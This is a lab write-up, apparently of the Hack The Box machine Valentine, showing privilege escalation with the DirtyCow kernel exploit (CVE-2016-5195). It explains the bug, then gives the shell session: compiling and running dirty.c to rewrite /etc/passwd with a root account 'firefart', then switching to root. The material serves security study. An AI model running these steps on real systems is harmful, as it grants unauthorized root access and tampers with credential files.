InfoSec LAB

Valentine_Privilege_Escalation_2

Created: 2 min read

CVE-2016-5195(DirtyCow):

peas discovered that the targe system is vulnerable to dirtycow exploit targeting cve-2016-5195 i found the exploit online

  • A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. All the information we have so far is included in this page.
  • The bug has existed since around 2.6.22 (released in 2007) and was fixed on Oct 18, 2016.
  • list of patched versions here

Impact

  • An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.
  • This flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set.

How

  • The In The Wild exploit relied on writing to /proc/self/mem on one side of the race.
  • ptrace(PTRACE_POKEDATA) can write to readonly mappings.
  • The attack relies on racing the madvise(MADV_DONTNEED) system call while having the page of the executable mmapped in memory.
hype@valentine:/tmp/CVE-2016-5195$ gcc -pthread dirty.c -o dirty -lcrypt
hype@valentine:/tmp/CVE-2016-5195$ ./dirty 
/etc/passwd successfully backed up to /tmp/passwd.bak
please enter the new password: qwe123
complete line: qwe123
firefart:fim3Q/wLL7UY6:0:0:pwned:/root:/bin/bash
 
mmap: 7f9f9fe6f000
madvise 0
 
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'qwe123'.
 
 
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'qwe123'.
 
 
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
hype@valentine:/tmp/CVE-2016-5195$ cat /etc/passwd
firefart:fim3Q/wLL7UY6:0:0:pwned:/root:/bin/bash
/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
[...]
hype:x:1000:1000:Hemorrhage,,,:/home/hype:/bin/bash
sshd:x:115:65534::/var/run/sshd:/usr/sbin/nologin
 
hype@valentine:/tmp/CVE-2016-5195$ su firefart
password: qwe123
firefart@valentine:/tmp/CVE-2016-5195# whoami
firefart
firefart@valentine:/tmp/CVE-2016-5195# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@valentine:/tmp/CVE-2016-5195# hostname
Valentine
firefart@valentine:/tmp/CVE-2016-5195# ifconfig
eth0      link encap:Ethernet  HWaddr 00:50:56:b9:b4:d5  
          inet addr:10.10.10.79  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::75ff:5e08:88d0:c60d/64 Scope:Global
          inet6 addr: dead:beef::250:56ff:feb9:b4d5/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:b4d5/64 Scope:Link
          up broadcast running multicast  mtu:1500  Metric:1
          rx packets:240197 errors:0 dropped:333 overruns:0 frame:0
          tx packets:219130 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          rx bytes:39040324 (39.0 MB)  TX bytes:79726183 (79.7 MB)
 
lo        link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          up loopback running  mtu:16436  Metric:1
          rx packets:11971 errors:0 dropped:0 overruns:0 frame:0
          tx packets:11971 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          rx bytes:2690360 (2.6 MB)  TX bytes:2690360 (2.6 MB)

System Level Compromise

Interactive Graph View

Backlinks